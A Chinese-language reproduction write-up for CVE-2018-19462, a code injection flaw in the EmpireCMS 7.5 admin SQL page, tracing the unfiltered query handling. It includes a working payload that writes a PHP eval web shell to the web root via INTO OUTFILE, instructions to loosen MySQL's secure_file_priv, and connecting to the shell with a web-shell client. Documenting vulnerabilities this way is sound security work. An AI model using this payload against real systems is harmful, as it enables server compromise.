(CVE-2018-19462)EmpireCMS 7.5 admindbDoSql.php代码注入漏洞

一、漏洞简介

EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。

二、漏洞影响

EmpireCMS 7.5

三、复现过程

漏洞出现的页面如下

1.png

分析源码定位漏洞出现的位置在/e/admin/db/DoSql.php,浏览代码,对sqltext使用RepSqlTbpre函数进行处理

2.png

跟进RepSqlTbpre函数,发现仅仅对表的前缀做替换,没有做其他任何处理

3.png

继续浏览代码,发现对$query使用DoRunQuery函数进行处理

4.png

跟进DoRunQuery函数,可以看到对$sql参数只做了去除空格、以";"分隔然后遍历,并你没有做别的限制和过滤,导致可以执行恶意的sql语句

5.png

登录后台,点击如下,输入一段写shell的payload,payload内容如下:

select '<?php @eval($_POST[1])?>' into outfile 'C:/phpStudy/WWW/empirecms/shell.php'

6.png

点击"执行SQL",提示错误,是由于mysql安全限制的原因

7.png

修改mysql的配置文件, 在[mysqld] 下添加条目: secure_file_priv =,保存之后,然后重启mysql

8.png

再次执行SQL语句,可以看到成功执行SQL语句

9.png

查看是否成功上传shell

10.png

菜刀连接,成功getshell

11.png

参考链接

https://www.shuzhiduo.com/A/E35pxYYE5v/